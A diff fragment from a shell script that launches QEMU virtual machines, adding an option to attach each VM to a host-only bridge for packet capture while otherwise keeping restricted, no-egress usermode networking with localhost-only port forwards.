# fleet runs collision-free (slot 0 → 21, slot 1 → 121, slot 2 → 221, ...).
@ -56,14 +60,20 @@ EOF
exit 1
fi
# Build the netdev string with one hostfwd= per requested port pair.
NETDEV="user,id=n0,restrict=on"
IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
for pair in "${_PAIRS[@]}"; do
host_port="${pair%%:*}"
guest_port="${pair##*:}"
NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
done
# Build the netdev string. With BRIDGE set we use a tap on the host-only
# bridge (so source-4 pcap captures the traffic). Without it, SLIRP
# usermode + restrict=on for the no-egress smoke runs.
if [[ -n "$BRIDGE" ]]; then
NETDEV="tap,id=n0,ifname=$TAP,script=no,downscript=no"
else
NETDEV="user,id=n0,restrict=on"
IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
for pair in "${_PAIRS[@]}"; do
host_port="${pair%%:*}"
guest_port="${pair##*:}"
NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
done
fi
# Pick acceleration: explicit override wins; otherwise use KVM if the
# device is present, else TCG.